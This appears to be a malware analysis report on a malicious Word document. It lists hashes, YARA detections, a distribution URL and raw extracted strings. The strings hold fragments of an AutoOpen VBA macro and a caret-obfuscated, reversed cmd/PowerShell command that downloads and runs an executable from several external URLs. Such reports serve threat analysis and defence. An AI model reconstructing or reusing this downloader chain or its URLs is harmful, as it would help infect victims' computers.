Sample details: 5f9902ff90d59b05a6b199c07aba516e

Hashes
MD5: 5f9902ff90d59b05a6b199c07aba516e
SHA1: 11a4b306f91d2310539f48519eed16d5ce917917
SHA256: 39b303a7f5e7931b7cd4eb39576e35e6f5a9ad139d020ccdbc8d427c1ae49a03
SSDEEP: 768:qpJcaUitGAlmrJpmxlzC+w99NBdQ+1otk3GjRHzn8h5xBN689k92x5o:qptJlmrJpmxlRw99NBdQ+atk3Gtn6kU
Details
File Type: Composite
Yara Hits
YRP/office_document_vba | YRP/Office_AutoOpen_Macro | YRP/Contains_VBA_macro_code | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | FlorianRoth/Office_AutoOpen_Macro
Source
http://apicecon.com.br/09012NQNFL/ACH/Smallbusiness/
http://apicecon.com.br/09012NQNFL/ACH/Smallbusiness
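Strings
(Raw strings extracted from the sample, as fragmented by the extractor. Among them are pieces of a VBA AutoOpen macro that calls Shell, and a caret-escaped `/V^:ON` command line, apparently cmd with delayed expansion. Its payload is stored reversed and reassembled one character at a time by a `for /L` loop. The reversed text includes the words for a PowerShell WebClient file download.)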
		ZYhhklBjGoCsVIwDAOi  
a$	gdJz4
UNICODE
 Compressed by jpeg-recompress
&""&0-0>>T
&""&0-0>>T
mdK%?<y
 "$0234p
rkitNP
yNkl[o
|"J$fb|
Z|&1Vk.
C,*uXt
Q,CT!'
)un$oW
#3BRSb
!AmZ]&54
d.:zM1
?tc&<i
 zM7&v
p[<fu$H 
>uiq[m
yM\lb"
XKZF	:
y8xB6/
k(kEyw
!1AQaq
+LU>j/
:zPpr8aB
nUBa+W
Fita@\K
YU}MR.]8Zh
MH8GZb
b@q$Jo
Qrrz2_
N7DYha
j.dqd5
sE>,8?0
$`35QTt
`NuGWp
a	)M6V
r%%8Qv
jSK7eH+-
 "$1@0236`t
KsOuw,
c&fP"?r
c&fP""
8Xs9b\
2%Ufbl
fV"g15
#03`bqr
`dj)X0
#&%"y:
hY?ZWP
R`H$E[!
[Content_Types].wpP
_LGzv/.LGzv
VsjZU/VsjZU/VsjZUManager.wpP
VsjZU/VsjZU/VsjZU1.wpP
$4vq^W
MB[F7x"
>Yr]H+
a!e9#i
An7jah
VsjZU/VsjZU/_LGzv/VsjZUManager.wpP.LGzv
K(M&$R(.1
[Content_Types].wpPPK
_LGzv/.LGzvPK
VsjZU/VsjZU/VsjZUManager.wpPPK
VsjZU/VsjZU/VsjZU1.wpPPK
VsjZU/VsjZU/_LGzv/VsjZUManager.wpP.LGzvPK
zWZtm version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Normal.dotm
Microsoft Office Word
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\system3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2DF
8D04C-5B
FA-101B-
m Files\@Common
icrosoft
 Shared\
OFFICE16
\MSO.DLL
M 16.0
hdsOBApG
pizBCa
JRqDVjG
Attribut
e VB_Nam
e = "hds
mal.This
Document
VGlobal
ateDeriv
$Customi
1Sub A
utoOpen(
   Dim
 pdYMEp
28860619g
4628 95274I
5645197'@+C
buEVpYG
Shell@
 GEuwUIq
wP + UwJ
BScQFJCk
MVzHbJLa
1KHZnJ
1881825n5
7!. ln
*\CNormalrU
ThisDocument
Project
hdsOBAp
Module1
pizBCaJRqDVj
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB
C:\Windows\system32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
Document
AutoOpen
md /V^:ON/
s^e^t Q^3^d^A=^ ^    
 ^  ^       ^  }}^{h
aer^b^;vA^K^$ me^
tI-ek^ovnI^;)
vA^K^$ ,zZL^$(e^l^iFda^
o^ln^w^o^D^.pl^
q^$^{^yrt^{)R
W^b^$^ 
ni^ ^z^Z^L^$(h
aer^of;'^e^x^e.
^'^+a^JN^$+^'\^'+
b^u^p:vne^$=v^
AK$^;^'0^
7^1^' =^ aJN$;)
^'@^'(ti^l^pS^.^'X/^mo
n^i^s^e^mh
e^tari^w//:^p^t^t
h@j/^t^en^
.^s^s^e
n^l^l^e^w^tr^a//^:p^t^th@
X^Yh/m^o
n^aill^a//^:^p^tt^
h@1^H/r^f.ved-^s^p^pa.ru
^:pt^th@B^o^l^ai
R^l^k/m^
^.^s^uwag//^:
p^tt^h^'=RW^b^$^;tn
beW^.^t^eN
e^j^bo^-^w^en^=p
lq^$^ ^l^le^hsrew^op&&^f
^or /^L %^F ^in (^35^1;
^-1^;^0)^do ^set V
^P=!V^P!!Q^3^d^A:~%^F,1!&&i^
f %^F=^=^0 
a^l^l %V^P:~^-3^5
Attribut
e VB_Nam
e = "piz
BCaJRqDV
tion GEu
wUIqwP()
Dim  SIbYi
O4664p2525
W28641
WjTXXwLi
DForma
t(Chr(15
d /V^:ON\/"
e^t Q^3^
d^A=^ ^
}0}^{h
aer^b^;v
A^K^$ me
tI-ek^
ovnI^;)B
,zZL^$(
e^l^iFda
o^ln^w^
o^D^.pl
q^$^{^yr
t^{)RB
+of;B'
'^+a^JN^
$+^'\^'+GA
^u^p:vne
^$=vC/AK$
^;^'0^
`djvcF
56569568
NQwlRQ
A*`XulBVG
wmQOEW
"7^1^' 
^'(t@,^pS
^.^'X/^m
nC;n^i^
u kari
^w//:^p^
t^t"<h@j/
Iw^tr@^a//^:
X^Yh/m
n^aill
TJzRulf
B?9876(Tb
TtnQ(]
38160540
zz!Eh@1^H
/r^f.ved
0p^pa.r
Cennk?-%-/b
 Zs^puwag
Ft@^h^'=R
BDiwF>wG3
B*3360p2055`(
3535110N1
18`.8692
HnZCmwS
beWP"t^eNM
H_>+ N
^j^bo^-0u
J@e^hsre
vpP&&^f
^L %^F ^
in (^35^$1;
^do ^set
P=!V^HP!!
1!&&iSRf
=^=^02{
:~ ^-3^5
!faEBXz
!6453323
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
hdsOBAp
AutoOpen
pdYMEp
dmuXuF
nQoazG
buEVpYz\
ShellV
GEuwUIqwP
UwJBScQFJCkdRn
jDiXMVzHbJLa
CBQXSF%
TXEtFw
Module1b
pizBCaJRqDVj{
SIbYi3
SzlWUX
jTXXwLiVd
djvcF]/
NQwlRQS
wmQOEW'
JzRulfu
bTtnQF
BDiwFwY
TkIqZm$?
ztmdn=B
HnZCmwS
faEBXz{
ID="{AC52BB76-2B73-4489-92F0-333DBAE503F1}"
Document=hdsOBAp/&H00000000
Module=pizBCaJRqDVj
ExeName32="CpmOIzn"
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="6567B15E73C777C777C777C777"
DPB="CAC81EF982FA82FA82"
GC="2F2DFB64P
05AC6BAD6BAD94"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
hdsOBAp=0, 0, 0, 0, C
pizBCaJRqDVj=25, 25, 1385, 693, 
hdsOBAp
pizBCaJRqDVj
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Normal.dotm
Microsoft Office Word